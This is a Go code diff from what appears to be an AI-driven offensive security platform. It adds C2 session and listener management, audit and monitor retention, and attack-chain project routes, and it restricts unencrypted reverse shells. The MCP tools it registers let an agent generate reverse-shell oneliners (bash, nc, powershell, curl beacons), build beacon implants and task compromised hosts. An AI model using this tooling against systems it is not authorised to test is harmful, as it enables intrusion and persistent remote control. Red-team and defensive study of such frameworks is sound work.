"cyberstrike-ai/internal/mcp"
|
"cyberstrike-ai/internal/mcp"
|
||||||
"cyberstrike-ai/internal/mcp/builtin"
|
"cyberstrike-ai/internal/mcp/builtin"
|
||||||
|
"cyberstrike-ai/internal/monitor"
|
||||||
"cyberstrike-ai/internal/robot"
|
"cyberstrike-ai/internal/robot"
|
||||||
"cyberstrike-ai/internal/security"
|
"cyberstrike-ai/internal/security"
|
||||||
"cyberstrike-ai/internal/skillpackage"
|
"cyberstrike-ai/internal/skillpackage"
|
||||||
"cyberstrike-ai/internal/storage"
|
|
||||||
|
|
||||||
"github.com/gin-gonic/gin"
|
"github.com/gin-gonic/gin"
|
||||||
"github.com/google/uuid"
|
"github.com/google/uuid"
|
||||||
@@ -100,6 +100,10 @@ func New(cfg *config.Config, log *logger.Logger, configPath string) (*App, error
|
|||||||
auditSvc.PurgeExpired()
|
auditSvc.PurgeExpired()
|
||||||
audit.StartRetentionLoop(auditSvc, log.Logger)
|
audit.StartRetentionLoop(auditSvc, log.Logger)
|
||||||
|
|
||||||
|
monitorRetention := monitor.NewService(db, cfg, log.Logger)
|
||||||
|
monitorRetention.PurgeExpired()
|
||||||
|
monitor.StartRetentionLoop(monitorRetention, log.Logger)
|
||||||
|
|
||||||
// 创建MCP服务器(带数据库持久化)
|
// 创建MCP服务器(带数据库持久化)
|
||||||
mcpServer := mcp.NewServerWithStorage(log.Logger, db)
|
mcpServer := mcp.NewServerWithStorage(log.Logger, db)
|
||||||
mcpServer.ConfigureHTTPToolCallTimeoutFromAgentMinutes(cfg.Agent.ToolTimeoutMinutes)
|
mcpServer.ConfigureHTTPToolCallTimeoutFromAgentMinutes(cfg.Agent.ToolTimeoutMinutes)
|
||||||
@@ -130,23 +134,6 @@ func New(cfg *config.Config, log *logger.Logger, configPath string) (*App, error
|
|||||||
externalMCPMgr.StartAllEnabled()
|
externalMCPMgr.StartAllEnabled()
|
||||||
}
|
}
|
||||||
|
|
||||||
// 初始化结果存储
|
|
||||||
resultStorageDir := "tmp"
|
|
||||||
if cfg.Agent.ResultStorageDir != "" {
|
|
||||||
resultStorageDir = cfg.Agent.ResultStorageDir
|
|
||||||
}
|
|
||||||
|
|
||||||
// 确保存储目录存在
|
|
||||||
if err := os.MkdirAll(resultStorageDir, 0755); err != nil {
|
|
||||||
return nil, fmt.Errorf("创建结果存储目录失败: %w", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// 创建结果存储实例
|
|
||||||
resultStorage, err := storage.NewFileResultStorage(resultStorageDir, log.Logger)
|
|
||||||
if err != nil {
|
|
||||||
return nil, fmt.Errorf("初始化结果存储失败: %w", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// 创建Agent
|
// 创建Agent
|
||||||
maxIterations := cfg.Agent.MaxIterations
|
maxIterations := cfg.Agent.MaxIterations
|
||||||
if maxIterations <= 0 {
|
if maxIterations <= 0 {
|
||||||
@@ -155,12 +142,6 @@ func New(cfg *config.Config, log *logger.Logger, configPath string) (*App, error
|
|||||||
agent := agent.NewAgent(&cfg.OpenAI, &cfg.Agent, mcpServer, externalMCPMgr, log.Logger, maxIterations)
|
agent := agent.NewAgent(&cfg.OpenAI, &cfg.Agent, mcpServer, externalMCPMgr, log.Logger, maxIterations)
|
||||||
agent.UpdateToolDescriptionMode(cfg.Security.ToolDescriptionMode)
|
agent.UpdateToolDescriptionMode(cfg.Security.ToolDescriptionMode)
|
||||||
|
|
||||||
// 设置结果存储到Agent
|
|
||||||
agent.SetResultStorage(resultStorage)
|
|
||||||
|
|
||||||
// 设置结果存储到Executor(用于查询工具)
|
|
||||||
executor.SetResultStorage(resultStorage)
|
|
||||||
|
|
||||||
// 初始化知识库模块(如果启用)
|
// 初始化知识库模块(如果启用)
|
||||||
var knowledgeManager *knowledge.Manager
|
var knowledgeManager *knowledge.Manager
|
||||||
var knowledgeRetriever *knowledge.Retriever
|
var knowledgeRetriever *knowledge.Retriever
|
||||||
@@ -315,6 +296,15 @@ func New(cfg *config.Config, log *logger.Logger, configPath string) (*App, error
|
|||||||
skillsDir := skillpackage.SkillsRootFromConfig(cfg.SkillsDir, configPath)
|
skillsDir := skillpackage.SkillsRootFromConfig(cfg.SkillsDir, configPath)
|
||||||
log.Logger.Info("Skills 目录(Eino ADK skill 中间件 + Web 管理 API)", zap.String("skillsDir", skillsDir))
|
log.Logger.Info("Skills 目录(Eino ADK skill 中间件 + Web 管理 API)", zap.String("skillsDir", skillsDir))
|
||||||
configDir := filepath.Dir(configPath)
|
configDir := filepath.Dir(configPath)
|
||||||
|
plantaskRel := strings.TrimSpace(cfg.MultiAgent.EinoMiddleware.PlantaskRelDir)
|
||||||
|
if plantaskRel == "" {
|
||||||
|
plantaskRel = ".eino/plantask"
|
||||||
|
}
|
||||||
|
plantaskBase := filepath.Join(skillsDir, plantaskRel)
|
||||||
|
// Match eino_adk_run_loop: checkpoint_dir is used as configured (relative to process CWD when not absolute).
|
||||||
|
checkpointBase := strings.TrimSpace(cfg.MultiAgent.EinoMiddleware.CheckpointDir)
|
||||||
|
reductionRoot := strings.TrimSpace(cfg.MultiAgent.EinoMiddleware.ReductionRootDir)
|
||||||
|
db.SetEinoConversationDirs(plantaskBase, checkpointBase, reductionRoot)
|
||||||
agent.SetPromptBaseDir(configDir)
|
agent.SetPromptBaseDir(configDir)
|
||||||
|
|
||||||
agentsDir := cfg.AgentsDir
|
agentsDir := cfg.AgentsDir
|
||||||
@@ -341,6 +331,7 @@ func New(cfg *config.Config, log *logger.Logger, configPath string) (*App, error
|
|||||||
}
|
}
|
||||||
monitorHandler := handler.NewMonitorHandler(mcpServer, executor, db, log.Logger)
|
monitorHandler := handler.NewMonitorHandler(mcpServer, executor, db, log.Logger)
|
||||||
monitorHandler.SetAudit(auditSvc)
|
monitorHandler.SetAudit(auditSvc)
|
||||||
|
monitorHandler.SetMonitorRetention(monitorRetention)
|
||||||
monitorHandler.SetExternalMCPManager(externalMCPMgr) // 设置外部MCP管理器,以便获取外部MCP执行记录
|
monitorHandler.SetExternalMCPManager(externalMCPMgr) // 设置外部MCP管理器,以便获取外部MCP执行记录
|
||||||
notificationHandler := handler.NewNotificationHandler(db, agentHandler, log.Logger)
|
notificationHandler := handler.NewNotificationHandler(db, agentHandler, log.Logger)
|
||||||
groupHandler := handler.NewGroupHandler(db, log.Logger)
|
groupHandler := handler.NewGroupHandler(db, log.Logger)
|
||||||
@@ -384,9 +375,10 @@ func New(cfg *config.Config, log *logger.Logger, configPath string) (*App, error
|
|||||||
// 创建OpenAPI处理器
|
// 创建OpenAPI处理器
|
||||||
conversationHandler := handler.NewConversationHandler(db, log.Logger)
|
conversationHandler := handler.NewConversationHandler(db, log.Logger)
|
||||||
conversationHandler.SetAudit(auditSvc)
|
conversationHandler.SetAudit(auditSvc)
|
||||||
|
conversationHandler.SetTaskStopper(agentHandler)
|
||||||
auditHandler := handler.NewAuditHandler(db, auditSvc, log.Logger)
|
auditHandler := handler.NewAuditHandler(db, auditSvc, log.Logger)
|
||||||
robotHandler := handler.NewRobotHandler(cfg, db, agentHandler, log.Logger)
|
robotHandler := handler.NewRobotHandler(cfg, db, agentHandler, log.Logger)
|
||||||
openAPIHandler := handler.NewOpenAPIHandler(db, log.Logger, resultStorage, conversationHandler, agentHandler)
|
openAPIHandler := handler.NewOpenAPIHandler(db, log.Logger, conversationHandler, agentHandler)
|
||||||
|
|
||||||
// 创建 App 实例(部分字段稍后填充)
|
// 创建 App 实例(部分字段稍后填充)
|
||||||
app := &App{
|
app := &App{
|
||||||
@@ -845,6 +837,7 @@ func setupRoutes(
|
|||||||
protected.PUT("/batch-tasks/:queueId/schedule-enabled", agentHandler.SetBatchQueueScheduleEnabled)
|
protected.PUT("/batch-tasks/:queueId/schedule-enabled", agentHandler.SetBatchQueueScheduleEnabled)
|
||||||
protected.DELETE("/batch-tasks/:queueId", agentHandler.DeleteBatchQueue)
|
protected.DELETE("/batch-tasks/:queueId", agentHandler.DeleteBatchQueue)
|
||||||
protected.PUT("/batch-tasks/:queueId/tasks/:taskId", agentHandler.UpdateBatchTask)
|
protected.PUT("/batch-tasks/:queueId/tasks/:taskId", agentHandler.UpdateBatchTask)
|
||||||
|
protected.POST("/batch-tasks/:queueId/tasks/:taskId/run", agentHandler.RunSingleBatchTask)
|
||||||
protected.POST("/batch-tasks/:queueId/tasks", agentHandler.AddBatchTask)
|
protected.POST("/batch-tasks/:queueId/tasks", agentHandler.AddBatchTask)
|
||||||
protected.DELETE("/batch-tasks/:queueId/tasks/:taskId", agentHandler.DeleteBatchTask)
|
protected.DELETE("/batch-tasks/:queueId/tasks/:taskId", agentHandler.DeleteBatchTask)
|
||||||
|
|
||||||
@@ -880,6 +873,7 @@ func setupRoutes(
|
|||||||
protected.DELETE("/monitor/execution/:id", monitorHandler.DeleteExecution)
|
protected.DELETE("/monitor/execution/:id", monitorHandler.DeleteExecution)
|
||||||
protected.DELETE("/monitor/executions", monitorHandler.DeleteExecutions)
|
protected.DELETE("/monitor/executions", monitorHandler.DeleteExecutions)
|
||||||
protected.GET("/monitor/stats", monitorHandler.GetStats)
|
protected.GET("/monitor/stats", monitorHandler.GetStats)
|
||||||
|
protected.GET("/monitor/calls-timeline", monitorHandler.GetCallsTimeline)
|
||||||
protected.GET("/notifications/summary", notificationHandler.GetSummary)
|
protected.GET("/notifications/summary", notificationHandler.GetSummary)
|
||||||
protected.POST("/notifications/read", notificationHandler.MarkRead)
|
protected.POST("/notifications/read", notificationHandler.MarkRead)
|
||||||
|
|
||||||
@@ -891,6 +885,7 @@ func setupRoutes(
|
|||||||
protected.POST("/config/apply", configHandler.ApplyConfig)
|
protected.POST("/config/apply", configHandler.ApplyConfig)
|
||||||
protected.POST("/config/test-openai", configHandler.TestOpenAI)
|
protected.POST("/config/test-openai", configHandler.TestOpenAI)
|
||||||
protected.POST("/config/test-vision", configHandler.TestVision)
|
protected.POST("/config/test-vision", configHandler.TestVision)
|
||||||
|
protected.POST("/config/list-models", configHandler.ListModels)
|
||||||
|
|
||||||
// 系统设置 - 终端(执行命令,提高运维效率)
|
// 系统设置 - 终端(执行命令,提高运维效率)
|
||||||
protected.POST("/terminal/run", terminalHandler.RunCommand)
|
protected.POST("/terminal/run", terminalHandler.RunCommand)
|
||||||
@@ -1065,6 +1060,7 @@ func setupRoutes(
|
|||||||
// 漏洞管理
|
// 漏洞管理
|
||||||
protected.GET("/vulnerabilities", vulnerabilityHandler.ListVulnerabilities)
|
protected.GET("/vulnerabilities", vulnerabilityHandler.ListVulnerabilities)
|
||||||
protected.GET("/vulnerabilities/export", vulnerabilityHandler.ExportVulnerabilities)
|
protected.GET("/vulnerabilities/export", vulnerabilityHandler.ExportVulnerabilities)
|
||||||
|
protected.DELETE("/vulnerabilities/batch", vulnerabilityHandler.BatchDeleteVulnerabilities)
|
||||||
protected.GET("/vulnerabilities/filter-options", vulnerabilityHandler.GetVulnerabilityFilterOptions)
|
protected.GET("/vulnerabilities/filter-options", vulnerabilityHandler.GetVulnerabilityFilterOptions)
|
||||||
protected.GET("/vulnerabilities/stats", vulnerabilityHandler.GetVulnerabilityStats)
|
protected.GET("/vulnerabilities/stats", vulnerabilityHandler.GetVulnerabilityStats)
|
||||||
protected.GET("/vulnerabilities/:id", vulnerabilityHandler.GetVulnerability)
|
protected.GET("/vulnerabilities/:id", vulnerabilityHandler.GetVulnerability)
|
||||||
@@ -1073,6 +1069,7 @@ func setupRoutes(
|
|||||||
protected.DELETE("/vulnerabilities/:id", vulnerabilityHandler.DeleteVulnerability)
|
protected.DELETE("/vulnerabilities/:id", vulnerabilityHandler.DeleteVulnerability)
|
||||||
|
|
||||||
// 项目管理与事实黑板
|
// 项目管理与事实黑板
|
||||||
|
protected.GET("/projects/dashboard-summary", projectHandler.GetDashboardSummary)
|
||||||
protected.GET("/projects", projectHandler.ListProjects)
|
protected.GET("/projects", projectHandler.ListProjects)
|
||||||
protected.POST("/projects", projectHandler.CreateProject)
|
protected.POST("/projects", projectHandler.CreateProject)
|
||||||
protected.GET("/projects/:id/stats", projectHandler.GetProjectStats)
|
protected.GET("/projects/:id/stats", projectHandler.GetProjectStats)
|
||||||
@@ -1080,9 +1077,12 @@ func setupRoutes(
|
|||||||
protected.GET("/projects/:id", projectHandler.GetProject)
|
protected.GET("/projects/:id", projectHandler.GetProject)
|
||||||
protected.PUT("/projects/:id", projectHandler.UpdateProject)
|
protected.PUT("/projects/:id", projectHandler.UpdateProject)
|
||||||
protected.DELETE("/projects/:id", projectHandler.DeleteProject)
|
protected.DELETE("/projects/:id", projectHandler.DeleteProject)
|
||||||
|
protected.GET("/projects/:id/fact-graph", projectHandler.GetFactGraph)
|
||||||
|
protected.GET("/projects/:id/fact-edges", projectHandler.ListFactEdges)
|
||||||
|
protected.POST("/projects/:id/fact-edges", projectHandler.CreateFactEdge)
|
||||||
|
protected.DELETE("/projects/:id/fact-edges/:edgeId", projectHandler.DeleteFactEdge)
|
||||||
|
protected.POST("/projects/:id/promote-attack-chain/:conversationId", projectHandler.PromoteAttackChain)
|
||||||
protected.GET("/projects/:id/facts", projectHandler.ListFacts)
|
protected.GET("/projects/:id/facts", projectHandler.ListFacts)
|
||||||
protected.GET("/projects/:id/facts/:factId/previous-version", projectHandler.GetFactPreviousVersion)
|
|
||||||
protected.GET("/projects/:id/facts/:factId/versions", projectHandler.ListFactVersions)
|
|
||||||
protected.POST("/projects/:id/facts", projectHandler.CreateFact)
|
protected.POST("/projects/:id/facts", projectHandler.CreateFact)
|
||||||
protected.PUT("/projects/:id/facts/:factId", projectHandler.UpdateFact)
|
protected.PUT("/projects/:id/facts/:factId", projectHandler.UpdateFact)
|
||||||
protected.DELETE("/projects/:id/facts/:factId", projectHandler.DeleteFact)
|
protected.DELETE("/projects/:id/facts/:factId", projectHandler.DeleteFact)
|
||||||
@@ -1122,6 +1122,7 @@ func setupRoutes(
|
|||||||
c2Routes.POST("/listeners/:id/start", c2Handler.StartListener)
|
c2Routes.POST("/listeners/:id/start", c2Handler.StartListener)
|
||||||
c2Routes.POST("/listeners/:id/stop", c2Handler.StopListener)
|
c2Routes.POST("/listeners/:id/stop", c2Handler.StopListener)
|
||||||
c2Routes.GET("/sessions", c2Handler.ListSessions)
|
c2Routes.GET("/sessions", c2Handler.ListSessions)
|
||||||
|
c2Routes.DELETE("/sessions", c2Handler.DeleteSessions)
|
||||||
c2Routes.GET("/sessions/:id", c2Handler.GetSession)
|
c2Routes.GET("/sessions/:id", c2Handler.GetSession)
|
||||||
c2Routes.DELETE("/sessions/:id", c2Handler.DeleteSession)
|
c2Routes.DELETE("/sessions/:id", c2Handler.DeleteSession)
|
||||||
c2Routes.PUT("/sessions/:id/sleep", c2Handler.SetSessionSleep)
|
c2Routes.PUT("/sessions/:id/sleep", c2Handler.SetSessionSleep)
|
||||||
|
|||||||
@@ -61,6 +61,7 @@ func registerC2ListenerTool(s *mcp.Server, m *c2.Manager, l *zap.Logger, webList
|
|||||||
- stop: 停止监听器(需 listener_id)
|
- stop: 停止监听器(需 listener_id)
|
||||||
- delete: 删除监听器(需 listener_id)
|
- delete: 删除监听器(需 listener_id)
|
||||||
监听器类型: tcp_reverse, http_beacon, https_beacon, websocket
|
监听器类型: tcp_reverse, http_beacon, https_beacon, websocket
|
||||||
|
tcp_reverse 默认仅接受 CSB1 加密 Beacon(AES-GCM + ImplantToken)才登记会话;经典 bash/nc 反弹需在 config.allow_legacy_shell=true(公网不推荐)。
|
||||||
端口约束:create/update 的 bind_port 禁止与本平台 Web/API 所用端口相同。当前本服务该端口为 %d(配置项 server.port,随进程启动从配置文件加载)。若 bind_port 与此相同会导致本服务或监听器 bind 失败、Beacon/oneliner 误连到 Web 而非 C2。请为监听器另选空闲端口。`, webListenPort),
|
端口约束:create/update 的 bind_port 禁止与本平台 Web/API 所用端口相同。当前本服务该端口为 %d(配置项 server.port,随进程启动从配置文件加载)。若 bind_port 与此相同会导致本服务或监听器 bind 失败、Beacon/oneliner 误连到 Web 而非 C2。请为监听器另选空闲端口。`, webListenPort),
|
||||||
InputSchema: map[string]interface{}{
|
InputSchema: map[string]interface{}{
|
||||||
"type": "object",
|
"type": "object",
|
||||||
@@ -74,7 +75,7 @@ func registerC2ListenerTool(s *mcp.Server, m *c2.Manager, l *zap.Logger, webList
|
|||||||
"bind_port": map[string]interface{}{"type": "integer", "description": fmt.Sprintf("绑定端口(create 必填)。须 ≠ %d(当前本服务 Web/API 端口,配置 server.port)", webListenPort), "minimum": 1, "maximum": 65535},
|
"bind_port": map[string]interface{}{"type": "integer", "description": fmt.Sprintf("绑定端口(create 必填)。须 ≠ %d(当前本服务 Web/API 端口,配置 server.port)", webListenPort), "minimum": 1, "maximum": 65535},
|
||||||
"profile_id": map[string]interface{}{"type": "string", "description": "Malleable Profile ID"},
|
"profile_id": map[string]interface{}{"type": "string", "description": "Malleable Profile ID"},
|
||||||
"remark": map[string]interface{}{"type": "string", "description": "备注"},
|
"remark": map[string]interface{}{"type": "string", "description": "备注"},
|
||||||
"config": map[string]interface{}{"type": "object", "description": "高级配置(beacon 路径/TLS/OPSEC 等),create/update 可用"},
|
"config": map[string]interface{}{"type": "object", "description": "高级配置(beacon 路径/TLS/OPSEC 等),create/update 可用。tcp_reverse 可选 allow_legacy_shell:true 允许未加密经典 shell(默认 false)"},
|
||||||
},
|
},
|
||||||
"required": []string{"action"},
|
"required": []string{"action"},
|
||||||
},
|
},
|
||||||
@@ -222,20 +223,23 @@ func registerC2SessionTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) {
|
|||||||
s.RegisterTool(mcp.Tool{
|
s.RegisterTool(mcp.Tool{
|
||||||
Name: builtin.ToolC2Session,
|
Name: builtin.ToolC2Session,
|
||||||
Description: `C2 会话管理。通过 action 参数选择操作:
|
Description: `C2 会话管理。通过 action 参数选择操作:
|
||||||
- list: 列出会话(可按 listener_id/status/os/search 过滤)
|
- list: 列出会话(可按 listener_id/status/os/search/suspicious 过滤)
|
||||||
- get: 获取会话详情及最近任务历史(需 session_id)
|
- get: 获取会话详情及最近任务历史(需 session_id)
|
||||||
- set_sleep: 设置心跳间隔(需 session_id)
|
- set_sleep: 设置心跳间隔(需 session_id)
|
||||||
- kill: 下发 exit 任务让 implant 退出(需 session_id)
|
- kill: 下发 exit 任务让 implant 退出(需 session_id)
|
||||||
- delete: 删除会话记录(需 session_id)`,
|
- delete: 删除单个会话记录(需 session_id)
|
||||||
|
- delete_batch: 批量删除会话(需 session_ids 数组)`,
|
||||||
InputSchema: map[string]interface{}{
|
InputSchema: map[string]interface{}{
|
||||||
"type": "object",
|
"type": "object",
|
||||||
"properties": map[string]interface{}{
|
"properties": map[string]interface{}{
|
||||||
"action": map[string]interface{}{"type": "string", "description": "操作: list/get/set_sleep/kill/delete", "enum": []string{"list", "get", "set_sleep", "kill", "delete"}},
|
"action": map[string]interface{}{"type": "string", "description": "操作: list/get/set_sleep/kill/delete/delete_batch", "enum": []string{"list", "get", "set_sleep", "kill", "delete", "delete_batch"}},
|
||||||
"session_id": map[string]interface{}{"type": "string", "description": "会话 ID(get/set_sleep/kill/delete 需要)"},
|
"session_id": map[string]interface{}{"type": "string", "description": "会话 ID(get/set_sleep/kill/delete 需要)"},
|
||||||
|
"session_ids": map[string]interface{}{"type": "array", "items": map[string]interface{}{"type": "string"}, "description": "会话 ID 列表(delete_batch)"},
|
||||||
"listener_id": map[string]interface{}{"type": "string", "description": "按监听器过滤(list)"},
|
"listener_id": map[string]interface{}{"type": "string", "description": "按监听器过滤(list)"},
|
||||||
"status": map[string]interface{}{"type": "string", "description": "按状态过滤: active/sleeping/dead/killed(list)"},
|
"status": map[string]interface{}{"type": "string", "description": "按状态过滤: active/sleeping/dead/killed(list)"},
|
||||||
"os": map[string]interface{}{"type": "string", "description": "按 OS 过滤: linux/windows/darwin(list)"},
|
"os": map[string]interface{}{"type": "string", "description": "按 OS 过滤: linux/windows/darwin(list)"},
|
||||||
"search": map[string]interface{}{"type": "string", "description": "模糊搜索 hostname/username/IP(list)"},
|
"search": map[string]interface{}{"type": "string", "description": "模糊搜索 hostname/username/IP(list)"},
|
||||||
|
"suspicious": map[string]interface{}{"type": "boolean", "description": "仅疑似误报:离线且 tcp_* / unknown / PID 0(list)"},
|
||||||
"limit": map[string]interface{}{"type": "integer", "description": "返回数量上限(list)"},
|
"limit": map[string]interface{}{"type": "integer", "description": "返回数量上限(list)"},
|
||||||
"sleep_seconds": map[string]interface{}{"type": "integer", "description": "心跳间隔秒数(set_sleep)"},
|
"sleep_seconds": map[string]interface{}{"type": "integer", "description": "心跳间隔秒数(set_sleep)"},
|
||||||
"jitter_percent": map[string]interface{}{"type": "integer", "description": "抖动百分比 0-100(set_sleep)"},
|
"jitter_percent": map[string]interface{}{"type": "integer", "description": "抖动百分比 0-100(set_sleep)"},
|
||||||
@@ -257,6 +261,9 @@ func registerC2SessionTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) {
|
|||||||
if limit := int(getFloat64(params, "limit")); limit > 0 {
|
if limit := int(getFloat64(params, "limit")); limit > 0 {
|
||||||
filter.Limit = limit
|
filter.Limit = limit
|
||||||
}
|
}
|
||||||
|
if v, ok := params["suspicious"].(bool); ok && v {
|
||||||
|
filter.Suspicious = true
|
||||||
|
}
|
||||||
sessions, err := m.DB().ListC2Sessions(filter)
|
sessions, err := m.DB().ListC2Sessions(filter)
|
||||||
return makeC2Result(map[string]interface{}{"sessions": sessions, "count": len(sessions)}, err)
|
return makeC2Result(map[string]interface{}{"sessions": sessions, "count": len(sessions)}, err)
|
||||||
|
|
||||||
@@ -274,8 +281,16 @@ func registerC2SessionTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) {
|
|||||||
case "set_sleep":
|
case "set_sleep":
|
||||||
sleep := int(getFloat64(params, "sleep_seconds"))
|
sleep := int(getFloat64(params, "sleep_seconds"))
|
||||||
jitter := int(getFloat64(params, "jitter_percent"))
|
jitter := int(getFloat64(params, "jitter_percent"))
|
||||||
err := m.DB().SetC2SessionSleep(id, sleep, jitter)
|
task, err := m.SetSessionSleep(id, sleep, jitter)
|
||||||
return makeC2Result(map[string]interface{}{"updated": err == nil, "sleep_seconds": sleep, "jitter_percent": jitter}, err)
|
out := map[string]interface{}{
|
||||||
|
"updated": err == nil,
|
||||||
|
"sleep_seconds": sleep,
|
||||||
|
"jitter_percent": jitter,
|
||||||
|
}
|
||||||
|
if task != nil {
|
||||||
|
out["task_id"] = task.ID
|
||||||
|
}
|
||||||
|
return makeC2Result(out, err)
|
||||||
|
|
||||||
case "kill":
|
case "kill":
|
||||||
task, err := m.EnqueueTask(c2.EnqueueTaskInput{
|
task, err := m.EnqueueTask(c2.EnqueueTaskInput{
|
||||||
@@ -292,6 +307,17 @@ func registerC2SessionTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) {
|
|||||||
err := m.DB().DeleteC2Session(id)
|
err := m.DB().DeleteC2Session(id)
|
||||||
return makeC2Result(map[string]interface{}{"deleted": err == nil}, err)
|
return makeC2Result(map[string]interface{}{"deleted": err == nil}, err)
|
||||||
|
|
||||||
|
case "delete_batch":
|
||||||
|
rawIDs, _ := params["session_ids"].([]interface{})
|
||||||
|
ids := make([]string, 0, len(rawIDs))
|
||||||
|
for _, v := range rawIDs {
|
||||||
|
if s, ok := v.(string); ok && strings.TrimSpace(s) != "" {
|
||||||
|
ids = append(ids, strings.TrimSpace(s))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
n, err := m.DB().DeleteC2SessionsByIDs(ids)
|
||||||
|
return makeC2Result(map[string]interface{}{"deleted": n}, err)
|
||||||
|
|
||||||
default:
|
default:
|
||||||
return makeC2Result(nil, fmt.Errorf("unknown action: %s", action))
|
return makeC2Result(nil, fmt.Errorf("unknown action: %s", action))
|
||||||
}
|
}
|
||||||
@@ -491,11 +517,11 @@ func registerC2PayloadTool(s *mcp.Server, m *c2.Manager, l *zap.Logger, webListe
|
|||||||
Name: builtin.ToolC2Payload,
|
Name: builtin.ToolC2Payload,
|
||||||
Description: fmt.Sprintf(`C2 Payload 生成。通过 action 参数选择操作:
|
Description: fmt.Sprintf(`C2 Payload 生成。通过 action 参数选择操作:
|
||||||
- oneliner: 生成单行 payload。kind 必须与监听器协议一致,否则会失败:
|
- oneliner: 生成单行 payload。kind 必须与监听器协议一致,否则会失败:
|
||||||
• tcp_reverse:裸 TCP 反弹,可用 kind: bash, nc, nc_mkfifo, python, perl, powershell(bash 指 /dev/tcp 类,不是 HTTP)。
|
• tcp_reverse:默认仅支持 build 加密 Beacon;若监听器 config.allow_legacy_shell=true,才可用 kind: bash, nc, nc_mkfifo, python, perl, powershell。
|
||||||
• http_beacon / https_beacon / websocket:仅 HTTP(S) Beacon 轮询,oneliner 只能用 kind: curl_beacon(脚本内用 bash+curl,与「tcp 的 bash」不同)。curl_beacon 返回串末尾含「 &」用于把整个 bash -c 放后台;若用 exec/execute 同步执行,必须整段原样复制(含末尾 &)。若删掉 &,内部 while 死循环占满前台,调用会一直阻塞到超时/杀进程。
|
• http_beacon / https_beacon / websocket:仅 HTTP(S) Beacon 轮询,oneliner 只能用 kind: curl_beacon(脚本内用 bash+curl,与「tcp 的 bash」不同)。curl_beacon 返回串末尾含「 &」用于把整个 bash -c 放后台;若用 exec/execute 同步执行,必须整段原样复制(含末尾 &)。若删掉 &,内部 while 死循环占满前台,调用会一直阻塞到超时/杀进程。
|
||||||
• 需要经典 bash 反弹 shell 时:先 c2_listener create type=tcp_reverse,再对该监听器用 kind=bash。
|
• 公网部署 tcp_reverse 请用 build 生成加密 Beacon,勿开启 allow_legacy_shell。
|
||||||
• 省略 kind 时,会按监听器类型自动选第一个兼容类型(HTTP 系默认为 curl_beacon)。
|
• 省略 kind 时,会按监听器类型自动选第一个兼容类型(HTTP 系默认为 curl_beacon)。
|
||||||
- build: 交叉编译 beacon 二进制。支持 http_beacon / https_beacon / websocket / tcp_reverse(tcp_reverse 下植入端回连后先发魔数 CSB1,再走与 HTTP 相同的 AES-GCM JSON 语义;未发魔数的连接仍按经典交互 shell 处理)。
|
- build: 交叉编译 beacon 二进制。支持 http_beacon / https_beacon / websocket / tcp_reverse(tcp_reverse 植入端回连后先发魔数 CSB1,再经 AES-GCM 解密且校验 ImplantToken 后才登记会话)。
|
||||||
依赖的监听器 bind_port 须避开本服务 Web 端口 %d(配置 server.port,与 c2_listener 描述一致),否则 Beacon 无法正确回连。`, webListenPort),
|
依赖的监听器 bind_port 须避开本服务 Web 端口 %d(配置 server.port,与 c2_listener 描述一致),否则 Beacon 无法正确回连。`, webListenPort),
|
||||||
InputSchema: map[string]interface{}{
|
InputSchema: map[string]interface{}{
|
||||||
"type": "object",
|
"type": "object",
|
||||||
@@ -540,6 +566,9 @@ func registerC2PayloadTool(s *mcp.Server, m *c2.Manager, l *zap.Logger, webListe
|
|||||||
}
|
}
|
||||||
return makeC2Result(nil, fmt.Errorf("监听器类型 %s 不支持 %s,兼容类型: %v", listener.Type, kind, names))
|
return makeC2Result(nil, fmt.Errorf("监听器类型 %s 不支持 %s,兼容类型: %v", listener.Type, kind, names))
|
||||||
}
|
}
|
||||||
|
if err := c2.ValidateOnelinerForListener(listener, kind); err != nil {
|
||||||
|
return makeC2Result(nil, err)
|
||||||
|
}
|
||||||
input := c2.OnelinerInput{
|
input := c2.OnelinerInput{
|
||||||
Kind: kind,
|
Kind: kind,
|
||||||
Host: host,
|
Host: host,
|
||||||
|
|||||||
@@ -47,6 +47,24 @@ func (l *oneConnListener) Accept() (net.Conn, error) {
|
|||||||
func (l *oneConnListener) Close() error { return nil }
|
func (l *oneConnListener) Close() error { return nil }
|
||||||
func (l *oneConnListener) Addr() net.Addr { return l.addr }
|
func (l *oneConnListener) Addr() net.Addr { return l.addr }
|
||||||
|
|
||||||
|
// httpServerForTLSConn 从已有 Server 复制可服务字段,用于已握手 TLS 连接上的 HTTP 服务。
|
||||||
|
// 不能复制整个 http.Server(内含 atomic/noCopy 字段)。
|
||||||
|
func httpServerForTLSConn(src *http.Server) *http.Server {
|
||||||
|
return &http.Server{
|
||||||
|
Handler: src.Handler,
|
||||||
|
DisableGeneralOptionsHandler: src.DisableGeneralOptionsHandler,
|
||||||
|
ReadTimeout: src.ReadTimeout,
|
||||||
|
ReadHeaderTimeout: src.ReadHeaderTimeout,
|
||||||
|
WriteTimeout: src.WriteTimeout,
|
||||||
|
IdleTimeout: src.IdleTimeout,
|
||||||
|
MaxHeaderBytes: src.MaxHeaderBytes,
|
||||||
|
ConnState: src.ConnState,
|
||||||
|
ErrorLog: src.ErrorLog,
|
||||||
|
BaseContext: src.BaseContext,
|
||||||
|
ConnContext: src.ConnContext,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
func isTLSHandshakeRecord(b byte) bool {
|
func isTLSHandshakeRecord(b byte) bool {
|
||||||
return b == 0x16
|
return b == 0x16
|
||||||
}
|
}
|
||||||
@@ -172,8 +190,7 @@ func (m *mainServerMux) serveHTTPS(pc *peekedConn, localAddr net.Addr) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
plain := *srv
|
plain := httpServerForTLSConn(srv)
|
||||||
plain.TLSConfig = nil
|
|
||||||
ocl := &oneConnListener{conn: tlsConn, addr: localAddr}
|
ocl := &oneConnListener{conn: tlsConn, addr: localAddr}
|
||||||
if err := plain.Serve(ocl); err != nil && !errors.Is(err, net.ErrClosed) && !errors.Is(err, http.ErrServerClosed) {
|
if err := plain.Serve(ocl); err != nil && !errors.Is(err, net.ErrClosed) && !errors.Is(err, http.ErrServerClosed) {
|
||||||
m.logger.Debug("HTTPS 连接处理结束", zap.Error(err))
|
m.logger.Debug("HTTPS 连接处理结束", zap.Error(err))
|
||||||
|
